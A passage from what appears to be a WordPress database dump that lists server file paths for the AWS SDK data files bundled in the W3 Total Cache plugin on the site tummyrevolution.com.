19-01-25/api-2.json.php'),(5622,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appmesh/2019-01-25/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appmesh/2019-01-25/paginators-1.json.php'),(5623,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/apprunner/2020-05-15/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/apprunner/2020-05-15/api-2.json.php'),(5624,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/apprunner/2020-05-15/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/apprunner/2020-05-15/paginators-1.json.php'),(5625,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appstream/2016-12-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appstream/2016-12-01/api-2.json.php'),(5626,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appstream/2016-12-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appstream/2016-12-01/paginators-1.json.php'),(5627,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appstream/2016-12-01/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appstream/2016-12-01/smoke.json.php'),(5628,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appstream/2016-12-01/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appstream/2016-12-01/waiters-2.json.php'),(5629,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appsync/2017-07-25/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appsync/2017-07-25/api-2.json.php'),(5630,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appsync/2017-07-25/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appsync/2017-07-25/paginators-1.json.php'),(5631,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/athena/2017-05-18/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/athena/2017-05-18/api-2.json.php'),(5632,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/athena/2017-05-18/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/athena/2017-05-18/paginators-1.json.php'),(5633,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/athena/2017-05-18/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/athena/2017-05-18/smoke.json.php'),(5634,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/auditmanager/2017-07-25/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/auditmanager/2017-07-25/api-2.json.php'),(5635,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/auditmanager/2017-07-25/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/auditmanager/2017-07-25/paginators-1.json.php'),(5636,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/autoscaling/2011-01-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/autoscaling/2011-01-01/api-2.json.php'),(5637,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/autoscaling/2011-01-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/autoscaling/2011-01-01/paginators-1.json.php'),(5638,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/autoscaling/2011-01-01/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/autoscaling/2011-01-01/smoke.json.php'),(5639,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/autoscaling/2011-01-01/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/autoscaling/2011-01-01/waiters-2.json.php'),(5640,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/autoscaling-plans/2018-01-06/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/autoscaling-plans/2018-01-06/api-2.json.php'),(5641,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/autoscaling-plans/2018-01-06/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/autoscaling-plans/2018-01-06/paginators-1.json.php'),(5642,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/backup/2018-11-15/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/backup/2018-11-15/api-2.json.php'),(5643,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/backup/2018-11-15/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/backup/2018-11-15/paginators-1.json.php'),(5644,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/batch/2016-08-10/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/batch/2016-08-10/api-2.json.php'),(5645,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/batch/2016-08-10/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/batch/2016-08-10/paginators-1.json.php'),(5646,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/batch/2016-08-10/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/batch/2016-08-10/smoke.json.php'),(5647,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/braket/2019-09-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/braket/2019-09-01/api-2.json.php'),(5648,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/braket/2019-09-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/braket/2019-09-01/paginators-1.json.php'),(5649,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/budgets/2016-10-20/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/budgets/2016-10-20/api-2.json.php'),(5650,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/budgets/2016-10-20/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/budgets/2016-10-20/paginators-1.json.php'),(5651,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ce/2017-10-25/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ce/2017-10-25/api-2.json.php'),(5652,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ce/2017-10-25/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ce/2017-10-25/paginators-1.json.php'),(5653,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/chime/2018-05-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/chime/2018-05-01/api-2.json.php'),(5654,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/chime/2018-05-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/chime/2018-05-01/paginators-1.json.php'),(5655,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloud9/2017-09-23/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloud9/2017-09-23/api-2.json.php'),(5656,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloud9/2017-09-23/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloud9/2017-09-23/paginators-1.json.php'),(5657,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/clouddirectory/2016-05-10/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/clouddirectory/2016-05-10/api-2.json.php'),(5658,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/clouddirectory/2016-05-10/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/clouddirectory/2016-05-10/paginators-1.json.php'),(5659,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/clouddirectory/2017-01-11/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/clouddirectory/2017-01-11/api-2.json.php'),(5660,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/clouddirectory/2017-01-11/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/clouddirectory/2017-01-11/paginators-1.json.php'),(5661,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudformation/2010-05-15/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudformation/2010-05-15/api-2.json.php'),(5662,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudformation/2010-05-15/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudformation/2010-05-15/paginators-1.json.php'),(5663,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudformation/2010-05-15/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudformation/2010-05-15/smoke.json.php'),(5664,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudformation/2010-05-15/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudformation/2010-05-15/waiters-2.json.php'),(5665,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2015-07-27/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2015-07-27/api-2.json.php'),(5666,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2015-07-27/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2015-07-27/paginators-1.json.php'),(5667,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2015-07-27/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2015-07-27/waiters-2.json.php'),(5668,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-01-28/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-01-28/api-2.json.php'),(5669,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-01-28/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-01-28/paginators-1.json.php'),(5670,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-01-28/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-01-28/waiters-2.json.php'),(5671,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-08-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-08-01/api-2.json.php'),(5672,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-08-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-08-01/paginators-1.json.php'),(5673,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-08-01/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-08-01/waiters-2.json.php'),(5674,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-08-20/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-08-20/api-2.json.php'),(5675,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-08-20/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-08-20/paginators-1.json.php'),(5676,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-08-20/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-08-20/waiters-2.json.php'),(5677,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-09-07/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-09-07/api-2.json.php'),(5678,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-09-07/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-09-07/paginators-1.json.php'),(5679,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-09-07/waiters-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-09-07/waiters-1.json.php'),(5680,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-09-07/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-09-07/waiters-2.json.php'),(5681,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-09-29/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-09-29/api-2.json.php'),(5682,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-09-29/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-09-29/paginators-1.json.php'),(5683,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-09-29/waiters-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-09-29/waiters-1.json.php'),(5684,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-09-29/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-09-29/waiters-2.json.php'),(5685,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-11-25/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-11-25/api-2.json.php'),(5686,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-11-25/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-11-25/paginators-1.json.php'),(5687,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-11-25/waiters-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-11-25/waiters-1.json.php'),(5688,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-11-25/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-11-25/waiters-2.json.php'),(5689,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-03-25/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-03-25/api-2.json.php'),(5690,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-03-25/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-03-25/paginators-1.json.php'),(5691,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-03-25/waiters-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-03-25/waiters-1.json.php'),(5692,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-03-25/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-03-25/waiters-2.json.php'),(5693,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-10-30/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-10-30/api-2.json.php'),(5694,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-10-30/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-10-30/paginators-1.json.php'),(5695,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-10-30/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-10-30/smoke.json.php'),(5696,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-10-30/waiters-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-10-30/waiters-1.json.php'),(5697,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-10-30/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-10-30/waiters-2.json.php'),(5698,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2018-06-18/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2018-06-18/api-2.json.php'),(5699,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2018-06-18/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2018-06-18/paginators-1.json.php'),(5700,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2018-06-18/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2018-06-18/smoke.json.php'),(5701,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2018-06-18/waiters-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2018-06-18/waiters-1.json.php'),(5702,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2018-06-18/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2018-06-18/waiters-2.json.php'),(5703,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2018-11-05/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2018-11-05/api-2.json.php'),(5704,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2018-11-05/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2018-11-05/paginators-1.json.php'),(5705,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2018-11-05/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2018-11-05/smoke.json.php'),(5706,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2018-11-05/waiters-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2018-11-05/waiters-1.json.php'),(5707,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2018-11-05/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2018-11-05/waiters-2.json.php'),(5708,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2019-03-26/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2019-03-26/api-2.json.php'),(5709,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2019-03-26/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2019-03-26/paginators-1.json.php'),(5710,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2019-03-26/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2019-03-26/smoke.json.php'),(5711,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2019-03-26/waiters-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2019-03-26/waiters-1.json.php'),(5712,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2019-03-26/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2019-03-26/waiters-2.json.php'),(5713,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2020-05-31/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2020-05-31/api-2.json.php'),(5714,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2020-05-31/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2020-05-31/paginators-1.json.php'),(5715,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2020-05-31/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2020-05-31/smoke.json.php'),(5716,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2020-05-31/waiters-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2020-05-31/waiters-1.json.php'),(5717,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2020-05-31/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2020-05-31/waiters-2.json.php'),(5718,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudhsm/2014-05-30/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudhsm/2014-05-30/api-2.json.php'),(5719,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudhsm/2014-05-30/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudhsm/2014-05-30/paginators-1.json.php'),(5720,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudhsmv2/2017-04-28/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudhsmv2/2017-04-28/api-2.json.php'),(5721,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudhsmv2/2017-04-28/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudhsmv2/2017-04-28/paginators-1.json.php'),(5722,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudhsmv2/2017-04-28/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudhsmv2/2017-04-28/smoke.json.php'),(5723,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudsearch/2013-01-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudsearch/2013-01-01/api-2.json.php'),(5724,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudsearch/2013-01-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudsearch/2013-01-01/paginators-1.json.php'),(5725,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudsearch/2013-01-01/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudsearch/2013-01-01/smoke.json.php'),(5726,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudsearchdomain/2013-01-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudsearchdomain/2013-01-01/api-2.json.php'),(5727,'/home/tummmyov/